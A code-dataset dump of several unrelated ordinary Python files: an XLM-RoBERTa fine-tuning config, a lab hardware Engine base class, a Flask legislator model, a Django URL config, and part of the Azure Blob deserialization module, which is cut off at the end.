        'eval_batch_size': 8,
        'weight_decay': 0,
        'learning_rate': 1e-5,
        'adam_epsilon': 1e-8,
        'warmup_ratio': 0.06,
        'warmup_steps': 0,
        'max_grad_norm': 1.0,
        'do_lower_case': False,

        "no_cache": False,
        "no_save": False,
        "save_recent_only": True,
        'save_model_every_epoch': True,
        'evaluate_during_training': True,
        "evaluate_during_training_silent": True,
        "evaluate_during_training_verbose": True,
        'use_cached_eval_features': False,
        "save_best_model": True,
        'save_eval_checkpoints': True,
        'tensorboard_dir': None,
        "save_optimizer_and_scheduler": True,
        'overwrite_output_dir': True,
        'reprocess_input_data': True,

        # leave two cores free for the main process when possible
        'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
        'n_gpu': 1,
        'use_multiprocessing': True,
        "multiprocessing_chunksize": 500,
        'silent': False,

        'wandb_project': None,
        'wandb_kwargs': {},

        "use_early_stopping": True,
        "early_stopping_patience": 10,
        "early_stopping_delta": 0,
        "early_stopping_metric": "eval_loss",
        "early_stopping_metric_minimize": True,
        "early_stopping_consider_epochs": False,

        "manual_seed": SEED,
        "config": {},
        "local_rank": -1,
        "encoding": None,
    }
    args.update(overrides)
    return args


# Classifier fine-tuning. training instances = 7000 -> ~875 batches at
# batch size 8, so evaluate/log/save every 60 steps.
args = _make_args(
    'temp/',
    max_seq_length=128,
    num_train_epochs=3,
    n_fold=3,
    logging_steps=60,
    save_steps=60,
    evaluate_during_training_steps=60,
)

# Language-model fine-tuning: longer sequences, fewer epochs, and a
# coarser evaluation cadence; outputs go to a separate temp/lm tree.
language_modeling_args = _make_args(
    'temp/lm/',
    max_seq_length=152,
    num_train_epochs=2,
    logging_steps=80,
    save_steps=80,
    evaluate_during_training_steps=80,
)
| 26.089655 | 106 | 0.665609 | from multiprocessing import cpu_count
TEMP_DIRECTORY = "temp/data"
TRAIN_FILE = "train.tsv"
TEST_FILE = "test.tsv"
DEV_RESULT_FILE = "dev_result.tsv"
DEV_EVAL_FILE = 'dev_eval.txt'
RESULT_FILE = "result.csv"
SUBMISSION_FOLDER = "transformers"
SUBMISSION_FILE = "transformers"
MODEL_TYPE = "xlmroberta"
MODEL_NAME = "xlm-roberta-large"
LANGUAGE_FINETUNE =False
SEED = 777
args = {
'output_dir': 'temp/outputs/',
"best_model_dir": "temp/outputs/best_model",
'cache_dir': 'temp/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 128,
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 3,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'n_fold': 3,
'logging_steps': 60,
'save_steps': 60,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 60,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
language_modeling_args = {
'output_dir': 'temp/lm/outputs/',
"best_model_dir": "temp/lm/outputs/best_model",
'cache_dir': 'temp/lm/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 152,
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 2,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'logging_steps': 80,
'save_steps': 80,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 80,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
| true | true |
f7101a8b865c1f87f28c1270c97bd9246634db2e | 69 | py | Python | emailtrail/__init__.py | akshaykmr/emailtrail | 8298e4b68c70f9b64198f54e4f3baf77d5fe54fa | [
"MIT"
] | 11 | 2020-04-05T07:24:46.000Z | 2021-01-10T06:58:00.000Z | emailtrail/__init__.py | akshaykmr/emailtrail | 8298e4b68c70f9b64198f54e4f3baf77d5fe54fa | [
"MIT"
] | 1 | 2021-09-09T16:46:18.000Z | 2021-09-09T16:46:18.000Z | emailtrail/__init__.py | akshaykmr/emailtrail | 8298e4b68c70f9b64198f54e4f3baf77d5fe54fa | [
"MIT"
] | 1 | 2020-10-26T17:50:10.000Z | 2020-10-26T17:50:10.000Z | from .module import * # noqa
from .models import Trail, Hop # noqa
| 17.25 | 37 | 0.695652 | from .module import *
from .models import Trail, Hop
| true | true |
f7101aab8fc3aaf31dfafe13235193eac5d70266 | 8,534 | py | Python | psi/controller/engine.py | bburan/psiexperiment | 9b70f7f0b4a4379d8c3fc463e1df272153afd247 | [
"MIT"
] | 5 | 2016-05-26T13:46:00.000Z | 2020-03-03T13:07:47.000Z | psi/controller/engine.py | bburan/psiexperiment | 9b70f7f0b4a4379d8c3fc463e1df272153afd247 | [
"MIT"
] | 2 | 2018-04-17T15:06:35.000Z | 2019-03-25T18:13:10.000Z | psi/controller/engine.py | bburan/psiexperiment | 9b70f7f0b4a4379d8c3fc463e1df272153afd247 | [
"MIT"
] | 1 | 2016-05-28T19:36:38.000Z | 2016-05-28T19:36:38.000Z | import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from atom.api import (Unicode, Float, Bool, observe, Property, Int, Typed,
Long, Value)
from enaml.core.api import Declarative, d_
from psi.core.enaml.api import PSIContribution
from ..util import copy_declarative
from .channel import (Channel, AnalogMixin, DigitalMixin, HardwareMixin,
SoftwareMixin, OutputMixin, InputMixin, CounterMixin)
def log_configuration(engine):
info = ['Engine configuration']
info.append('Engine {}'.format(engine.name))
for channel in engine.get_channels(direction='input', active=True):
info.append('\t channel {}'.format(channel.name))
for i in channel.inputs:
info.append('\t\t input {}'.format(i.name))
for channel in engine.get_channels(direction='output', active=True):
info.append('\t channel {}'.format(channel.name))
for o in channel.outputs:
info.append('\t\t output {}'.format(o.name))
log.info('\n'.join(info))
class Engine(PSIContribution):
'''
Defines hardware-specific interface
The user-defind attributes are ones set by the end-user of this library in
their IO manifest. The IO manifest is system specific and describes the
hardware they are using for data acquisition.
User-defined attributes
-----------------------
name : string
Name of the engine. Must be unique across all engines. This name is
used for debugging and metadata purposes.
master_clock : bool
If true, this engine will provide a timestamp whenever it's requested
via `get_ts`. This is typically used for software-timed events (events
generated by the hardware will typically have a timestamp that's
determined by the engine that controls that particular device).
hw_ai_monitor_period : float (sec)
Poll period (in seconds). This defines how quickly acquired (analog
input) data is downloaded from the buffers (and made available to
listeners). If you want to see data as soon as possible, set the poll
period to a small value. If your application is stalling or freezing,
set this to a larger value. This poll period is a suggestion, not a
contract.
hw_ao_monitor_period : float (sec)
Poll period (in seconds). This defines how often callbacks for the
analog outputs are notified (i.e., to generate additional samples for
playout). If the poll period is too long, then the analog output may
run out of samples. This poll period is a suggestion, not a contract.
Attributes
----------
configured : bool
True if the hardware has been configured.
Notes
-----
When subclassing, you only need to implement the callbacks required by your
hardware. For example, if your hardware only has analog inputs, you only
need to implement the analog input methods.
'''
name = d_(Unicode()).tag(metadata=True)
master_clock = d_(Bool(False)).tag(metadata=True)
lock = Value()
configured = Bool(False)
hw_ai_monitor_period = d_(Float(0.1)).tag(metadata=True)
hw_ao_monitor_period = d_(Float(1)).tag(metadata=True)
def _default_lock(self):
return threading.Lock()
def get_channels(self, mode=None, direction=None, timing=None,
active=True):
'''
Return channels matching criteria
Parameters
----------
mode : {None, 'analog', 'digital'
Type of channel
direction : {None, 'input, 'output'}
Direction
timing : {None, 'hardware', 'software'}
Hardware or software-timed channel. Hardware-timed channels have a
sampling frequency greater than 0.
active : bool
If True, return only channels that have configured inputs or
outputs.
'''
channels = [c for c in self.children if isinstance(c, Channel)]
if active:
channels = [c for c in channels if c.active]
if timing is not None:
if timing in ('hardware', 'hw'):
channels = [c for c in channels if isinstance(c, HardwareMixin)]
elif timing in ('software', 'sw'):
channels = [c for c in channels if isinstance(c, SoftwareMixin)]
else:
raise ValueError('Unsupported timing')
if direction is not None:
if direction in ('input', 'in'):
channels = [c for c in channels if isinstance(c, InputMixin)]
elif direction in ('output', 'out'):
channels = [c for c in channels if isinstance(c, OutputMixin)]
else:
raise ValueError('Unsupported direction')
if mode is not None:
if mode == 'analog':
channels = [c for c in channels if isinstance(c, AnalogMixin)]
elif mode == 'digital':
channels = [c for c in channels if isinstance(c, DigitalMixin)]
elif mode == 'counter':
channels = [c for c in channels if isinstance(c, CounterMixin)]
else:
raise ValueError('Unsupported mode')
return tuple(channels)
def get_channel(self, channel_name):
channels = self.get_channels(active=False)
for channel in channels:
if channel.name == channel_name:
return channel
m = '{} channel does not exist'.format(channel_name)
raise AttributeError(m)
def remove_channel(self, channel):
channel.set_parent(None)
def configure(self):
log_configuration(self)
for channel in self.get_channels():
log.debug('Configuring channel {}'.format(channel.name))
channel.configure()
self.configured = True
def register_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_done_callback(self, callback):
raise NotImplementedError
def write_hw_ao(self, data, offset, timeout=1):
'''
Write hardware-timed analog output data to the buffer
Parameters
----------
data : 2D array
Data to write (format channel x time)
offset : int
Sample at which to start writing data. Sample is relative to
beginning of data acquisition. This can overwrite data that has
already been written to the buffer but not consumed by the
hardware.
timeout : float
Time, in seconds, to keep trying to write the data before failing.
Notes
-----
When subclassing, raise an exception if the system attempts to write
data beginning at an offset that has already been consumed by the
hardware and cannot be modified.
'''
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def start(self):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def reset(self):
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def get_buffer_size(self, channel_name):
raise NotImplementedError
def get_offset(self, channel_name):
raise NotImplementedError
def update_hw_ao_multiple(self, offsets, channel_names, method):
raise NotImplementedError
def update_hw_ao(self, offsets, channel_name, method):
raise NotImplementedError
def clone(self, channel_names=None):
'''
Return a copy of this engine with specified channels included
This is intended as a utility function to assist various routines that
may need to do a quick operation before starting the experiment. For
example, calibration may only need to run a subset of the channels.
'''
new = copy_declarative(self)
if channel_names is not None:
for channel_name in channel_names:
channel = self.get_channel(channel_name)
copy_declarative(channel, parent=new)
return new
| 35.707113 | 80 | 0.639325 | import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from atom.api import (Unicode, Float, Bool, observe, Property, Int, Typed,
Long, Value)
from enaml.core.api import Declarative, d_
from psi.core.enaml.api import PSIContribution
from ..util import copy_declarative
from .channel import (Channel, AnalogMixin, DigitalMixin, HardwareMixin,
SoftwareMixin, OutputMixin, InputMixin, CounterMixin)
def log_configuration(engine):
info = ['Engine configuration']
info.append('Engine {}'.format(engine.name))
for channel in engine.get_channels(direction='input', active=True):
info.append('\t channel {}'.format(channel.name))
for i in channel.inputs:
info.append('\t\t input {}'.format(i.name))
for channel in engine.get_channels(direction='output', active=True):
info.append('\t channel {}'.format(channel.name))
for o in channel.outputs:
info.append('\t\t output {}'.format(o.name))
log.info('\n'.join(info))
class Engine(PSIContribution):
name = d_(Unicode()).tag(metadata=True)
master_clock = d_(Bool(False)).tag(metadata=True)
lock = Value()
configured = Bool(False)
hw_ai_monitor_period = d_(Float(0.1)).tag(metadata=True)
hw_ao_monitor_period = d_(Float(1)).tag(metadata=True)
def _default_lock(self):
return threading.Lock()
def get_channels(self, mode=None, direction=None, timing=None,
active=True):
channels = [c for c in self.children if isinstance(c, Channel)]
if active:
channels = [c for c in channels if c.active]
if timing is not None:
if timing in ('hardware', 'hw'):
channels = [c for c in channels if isinstance(c, HardwareMixin)]
elif timing in ('software', 'sw'):
channels = [c for c in channels if isinstance(c, SoftwareMixin)]
else:
raise ValueError('Unsupported timing')
if direction is not None:
if direction in ('input', 'in'):
channels = [c for c in channels if isinstance(c, InputMixin)]
elif direction in ('output', 'out'):
channels = [c for c in channels if isinstance(c, OutputMixin)]
else:
raise ValueError('Unsupported direction')
if mode is not None:
if mode == 'analog':
channels = [c for c in channels if isinstance(c, AnalogMixin)]
elif mode == 'digital':
channels = [c for c in channels if isinstance(c, DigitalMixin)]
elif mode == 'counter':
channels = [c for c in channels if isinstance(c, CounterMixin)]
else:
raise ValueError('Unsupported mode')
return tuple(channels)
def get_channel(self, channel_name):
channels = self.get_channels(active=False)
for channel in channels:
if channel.name == channel_name:
return channel
m = '{} channel does not exist'.format(channel_name)
raise AttributeError(m)
def remove_channel(self, channel):
channel.set_parent(None)
def configure(self):
log_configuration(self)
for channel in self.get_channels():
log.debug('Configuring channel {}'.format(channel.name))
channel.configure()
self.configured = True
def register_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_done_callback(self, callback):
raise NotImplementedError
def write_hw_ao(self, data, offset, timeout=1):
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def start(self):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def reset(self):
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def get_buffer_size(self, channel_name):
raise NotImplementedError
def get_offset(self, channel_name):
raise NotImplementedError
def update_hw_ao_multiple(self, offsets, channel_names, method):
raise NotImplementedError
def update_hw_ao(self, offsets, channel_name, method):
raise NotImplementedError
def clone(self, channel_names=None):
new = copy_declarative(self)
if channel_names is not None:
for channel_name in channel_names:
channel = self.get_channel(channel_name)
copy_declarative(channel, parent=new)
return new
| true | true |
f7101b9b13578e8edd6324341c1a4a1243423eca | 1,967 | py | Python | model.py | adinahhh/educated-citizen | 057406bbe4b348a88aeeed91bafbf337666d33ce | [
"Unlicense"
] | 1 | 2020-03-06T19:41:59.000Z | 2020-03-06T19:41:59.000Z | model.py | adinahhh/ballot-project | 057406bbe4b348a88aeeed91bafbf337666d33ce | [
"Unlicense"
] | 5 | 2020-03-24T18:21:24.000Z | 2021-08-23T20:39:22.000Z | model.py | adinahhh/ballot-project | 057406bbe4b348a88aeeed91bafbf337666d33ce | [
"Unlicense"
] | 1 | 2020-03-27T17:21:25.000Z | 2020-03-27T17:21:25.000Z | """Models for final hackbright project """
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
app = Flask(__name__)
class Legislator(db.Model):
    """ Info on current legislators (one row per sitting member). """
    __tablename__ = "current_legislators"
    # surrogate primary key
    legislator_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
    last_name = db.Column(db.String(25), nullable=False)
    full_name = db.Column(db.String(200), nullable=False)
    # NOTE(review): String(20) suggests full state names, not 2-letter
    # codes — confirm against the data source
    state = db.Column(db.String(20), nullable=False)
    party = db.Column(db.String(50), nullable=False)
    # cross-reference ids into external datasets; nullable where a
    # legislator may be missing from that dataset
    opensecrets_id = db.Column(db.String(10), nullable=True)
    govtrack_id = db.Column(db.Integer, nullable=False)
    votesmart_id = db.Column(db.Integer, nullable=True)
    phone = db.Column(db.String(25), nullable=True)
    website = db.Column(db.String(150), nullable=True)
    def __repr__(self):
        """ Human-readable summary used for debugging. """
        return f"Legislator: {self.full_name} party: {self.party}"
##### getting direction from Testing lab below #####
def testing_data():
    """Insert a single sample Legislator row for use in tests."""
    sample = Legislator(
        last_name="Smith",
        full_name="Jane Smith",
        state="LA",
        party="Democrat",
        opensecrets_id="N00003535",
        govtrack_id=400050,
        votesmart_id=27018,
        phone="504-555-5555",
        website="wwww.google.com",
    )
    db.session.add(sample)
    db.session.commit()
def connect_to_db(app, db_uri="postgresql:///legislature"):
    """ Connect database to Flask app."""

    # Configure to use my PostgreSQL database
    app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
    # disable the modification-tracking event system (unneeded overhead)
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    db.app = app
    db.init_app(app)
if __name__ == "__main__":
    # If this module is run interactively, it leaves the session in a
    # state of being able to work with the database directly.
    from server import app
    connect_to_db(app)
    print("Connected to DB.")
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
app = Flask(__name__)
class Legislator(db.Model):
__tablename__ = "current_legislators"
legislator_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
last_name = db.Column(db.String(25), nullable=False)
full_name = db.Column(db.String(200), nullable=False)
state = db.Column(db.String(20), nullable=False)
party = db.Column(db.String(50), nullable=False)
opensecrets_id = db.Column(db.String(10), nullable=True)
govtrack_id = db.Column(db.Integer, nullable=False)
votesmart_id = db.Column(db.Integer, nullable=True)
phone = db.Column(db.String(25), nullable=True)
website = db.Column(db.String(150), nullable=True)
def __repr__(self):
return f"Legislator: {self.full_name} party: {self.party}"
tesmart_id=27018,
phone="504-555-5555", website="wwww.google.com")
db.session.add(legis)
db.session.commit()
def connect_to_db(app, db_uri="postgresql:///legislature"):
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.app = app
db.init_app(app)
if __name__ == "__main__":
from server import app
connect_to_db(app)
print("Connected to DB.") | true | true |
f7101db4a3c92bf5fa914e5b238683710b1a59e8 | 827 | py | Python | server/clothes_shop/urls.py | Meerkat007/Clothes-Shop-Website- | 0f5f113c49b550a593ea50c8d409e9228381a81b | [
"MIT"
] | null | null | null | server/clothes_shop/urls.py | Meerkat007/Clothes-Shop-Website- | 0f5f113c49b550a593ea50c8d409e9228381a81b | [
"MIT"
] | null | null | null | server/clothes_shop/urls.py | Meerkat007/Clothes-Shop-Website- | 0f5f113c49b550a593ea50c8d409e9228381a81b | [
"MIT"
] | null | null | null | """clothes_shop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
# URL routing table: product pages are delegated to the `products` app's own
# URLconf; the Django admin site is mounted under /admin/.
urlpatterns = [
    url(r'^products/', include('products.urls')),
    url(r'^admin/', admin.site.urls),
]
| 35.956522 | 79 | 0.70133 | from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^products/', include('products.urls')),
url(r'^admin/', admin.site.urls),
]
| true | true |
f7101e05d6aa3f6fae0e0f1f853fa0dab34e1ab0 | 8,060 | py | Python | sdk/storage/azure-storage-blob/azure/storage/blob/_deserialize.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/storage/azure-storage-blob/azure/storage/blob/_deserialize.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/storage/azure-storage-blob/azure/storage/blob/_deserialize.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=no-self-use
from typing import ( # pylint: disable=unused-import
Tuple, Dict, List,
TYPE_CHECKING
)
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy
from ._shared.models import get_enum_value
from ._shared.response_handlers import deserialize_metadata
from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \
StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule
if TYPE_CHECKING:
from ._generated.models import PageList
def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers):
    """Invoke ``cls_method`` with the transport-level HTTP response.

    Pipeline responses wrap the raw response in an ``http_response``
    attribute; responses without that attribute are passed through as-is.
    """
    http_response = getattr(response, "http_response", response)
    return cls_method(http_response, obj, headers)
def deserialize_blob_properties(response, obj, headers):
    """Build a BlobProperties model from a download/get-properties response."""
    props = BlobProperties(
        metadata=deserialize_metadata(response, obj, headers),
        object_replication_source_properties=deserialize_ors_policies(response.http_response.headers),
        **headers
    )
    # When the response carries a Content-Range header, content_md5 is taken
    # from the x-ms-blob-content-md5 header instead (None when absent).
    if 'Content-Range' in headers:
        props.content_settings.content_md5 = headers.get('x-ms-blob-content-md5')
    return props
def deserialize_ors_policies(policy_dictionary):
    """Parse object-replication status headers into ObjectReplicationPolicy objects.

    Returns None when no header dictionary is given.
    """
    if policy_dictionary is None:
        return None
    # For source blobs the headers look like
    # "x-ms-or-<policy_id>_<rule_id>: {Complete, Failed}"; the value is the
    # replication status. The bare policy-id header is not a status entry.
    rules_by_policy = {}
    for header, status in policy_dictionary.items():
        if 'or-' not in header or header == 'x-ms-or-policy-id':
            continue
        # list-blobs returns "or-<ids>" while get-blob-properties returns
        # "x-ms-or-<ids>"; splitting on 'or-' handles both.
        ids = header.split('or-')[1].split('_')
        rules_by_policy.setdefault(ids[0], []).append(
            ObjectReplicationRule(rule_id=ids[1], status=status))
    return [ObjectReplicationPolicy(policy_id=pid, rules=rules)
            for pid, rules in rules_by_policy.items()]
def deserialize_blob_stream(response, obj, headers):
    """Attach deserialized blob properties to the stream object and return it
    together with the response's location mode."""
    obj.properties = deserialize_blob_properties(response, obj, headers)
    return response.http_response.location_mode, obj
def deserialize_container_properties(response, obj, headers):
    """Build a ContainerProperties model from a get-container-properties response."""
    return ContainerProperties(
        metadata=deserialize_metadata(response, obj, headers),
        **headers
    )
def get_page_ranges_result(ranges):
    # type: (PageList) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]]
    """Convert a PageList into ({start, end} dicts for valid ranges,
    {start, end} dicts for cleared ranges); empty lists when absent."""
    def _spans_to_dicts(spans):
        # Either attribute may be None/empty on the generated model.
        return [{'start': s.start, 'end': s.end} for s in spans] if spans else []
    return _spans_to_dicts(ranges.page_range), _spans_to_dicts(ranges.clear_range)
def service_stats_deserialize(generated):
    """Deserialize a ServiceStats object into a dict."""
    geo = generated.geo_replication
    return {
        'geo_replication': {
            'status': geo.status,
            'last_sync_time': geo.last_sync_time,
        }
    }
def service_properties_deserialize(generated):
    """Deserialize a ServiceProperties object into a dict."""
    # pylint: disable=protected-access
    return {
        'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging),
        'hour_metrics': Metrics._from_generated(generated.hour_metrics),
        'minute_metrics': Metrics._from_generated(generated.minute_metrics),
        'cors': [CorsRule._from_generated(rule) for rule in generated.cors],
        'target_version': generated.default_service_version,
        'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy),
        'static_website': StaticWebsite._from_generated(generated.static_website),
    }
def get_blob_properties_from_generated_code(generated):
    """Map an autorest-generated blob model onto a public BlobProperties object."""
    blob = BlobProperties()
    # Listing results flag whether the blob name was URL-encoded on the wire.
    if generated.name.encoded:
        blob.name = unquote(generated.name.content)
    else:
        blob.name = generated.name.content
    # blob_type may be an enum or raw string; normalize via get_enum_value.
    blob_type = get_enum_value(generated.properties.blob_type)
    blob.blob_type = BlobType(blob_type) if blob_type else None
    blob.etag = generated.properties.etag
    blob.deleted = generated.deleted
    blob.snapshot = generated.snapshot
    blob.is_append_blob_sealed = generated.properties.is_sealed
    # generated.metadata can be None; fall back to empty dict / None.
    blob.metadata = generated.metadata.additional_properties if generated.metadata else {}
    blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None
    blob.lease = LeaseProperties._from_generated(generated)  # pylint: disable=protected-access
    blob.copy = CopyProperties._from_generated(generated)  # pylint: disable=protected-access
    blob.last_modified = generated.properties.last_modified
    blob.creation_time = generated.properties.creation_time
    blob.content_settings = ContentSettings._from_generated(generated)  # pylint: disable=protected-access
    blob.size = generated.properties.content_length
    blob.page_blob_sequence_number = generated.properties.blob_sequence_number
    blob.server_encrypted = generated.properties.server_encrypted
    blob.encryption_scope = generated.properties.encryption_scope
    blob.deleted_time = generated.properties.deleted_time
    blob.remaining_retention_days = generated.properties.remaining_retention_days
    blob.blob_tier = generated.properties.access_tier
    blob.rehydrate_priority = generated.properties.rehydrate_priority
    blob.blob_tier_inferred = generated.properties.access_tier_inferred
    blob.archive_status = generated.properties.archive_status
    blob.blob_tier_change_time = generated.properties.access_tier_change_time
    blob.version_id = generated.version_id
    blob.is_current_version = generated.is_current_version
    blob.tag_count = generated.properties.tag_count
    blob.tags = parse_tags(generated.blob_tags)  # pylint: disable=protected-access
    blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata)
    blob.last_accessed_on = generated.properties.last_accessed_on
    blob.immutability_policy = ImmutabilityPolicy._from_generated(generated)  # pylint: disable=protected-access
    blob.has_legal_hold = generated.properties.legal_hold
    blob.has_versions_only = generated.has_versions_only
    return blob
def parse_tags(generated_tags):
    # type: (Optional[List[BlobTag]]) -> Union[Dict[str, str], None]
    """Deserialize a BlobTags object into a {key: value} dict, or None when empty."""
    if not generated_tags:
        return None
    return {tag.key: tag.value for tag in generated_tags.blob_tag_set}
| 46.057143 | 138 | 0.735732 |
from typing import (
Tuple, Dict, List,
TYPE_CHECKING
)
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy
from ._shared.models import get_enum_value
from ._shared.response_handlers import deserialize_metadata
from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \
StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule
if TYPE_CHECKING:
from ._generated.models import PageList
def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers):
try:
deserialized_response = response.http_response
except AttributeError:
deserialized_response = response
return cls_method(deserialized_response, obj, headers)
def deserialize_blob_properties(response, obj, headers):
blob_properties = BlobProperties(
metadata=deserialize_metadata(response, obj, headers),
object_replication_source_properties=deserialize_ors_policies(response.http_response.headers),
**headers
)
if 'Content-Range' in headers:
if 'x-ms-blob-content-md5' in headers:
blob_properties.content_settings.content_md5 = headers['x-ms-blob-content-md5']
else:
blob_properties.content_settings.content_md5 = None
return blob_properties
def deserialize_ors_policies(policy_dictionary):
if policy_dictionary is None:
return None
or_policy_status_headers = {key: val for key, val in policy_dictionary.items()
if 'or-' in key and key != 'x-ms-or-policy-id'}
parsed_result = {}
for key, val in or_policy_status_headers.items():
policy_and_rule_ids = key.split('or-')[1].split('_')
policy_id = policy_and_rule_ids[0]
rule_id = policy_and_rule_ids[1]
parsed_result[policy_id] = parsed_result.get(policy_id) or list()
parsed_result[policy_id].append(ObjectReplicationRule(rule_id=rule_id, status=val))
result_list = [ObjectReplicationPolicy(policy_id=k, rules=v) for k, v in parsed_result.items()]
return result_list
def deserialize_blob_stream(response, obj, headers):
blob_properties = deserialize_blob_properties(response, obj, headers)
obj.properties = blob_properties
return response.http_response.location_mode, obj
def deserialize_container_properties(response, obj, headers):
metadata = deserialize_metadata(response, obj, headers)
container_properties = ContainerProperties(
metadata=metadata,
**headers
)
return container_properties
def get_page_ranges_result(ranges):
page_range = []
clear_range = []
if ranges.page_range:
page_range = [{'start': b.start, 'end': b.end} for b in ranges.page_range]
if ranges.clear_range:
clear_range = [{'start': b.start, 'end': b.end} for b in ranges.clear_range]
return page_range, clear_range
def service_stats_deserialize(generated):
return {
'geo_replication': {
'status': generated.geo_replication.status,
'last_sync_time': generated.geo_replication.last_sync_time,
}
}
def service_properties_deserialize(generated):
return {
'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging),
'hour_metrics': Metrics._from_generated(generated.hour_metrics),
'minute_metrics': Metrics._from_generated(generated.minute_metrics),
'cors': [CorsRule._from_generated(cors) for cors in generated.cors],
'target_version': generated.default_service_version,
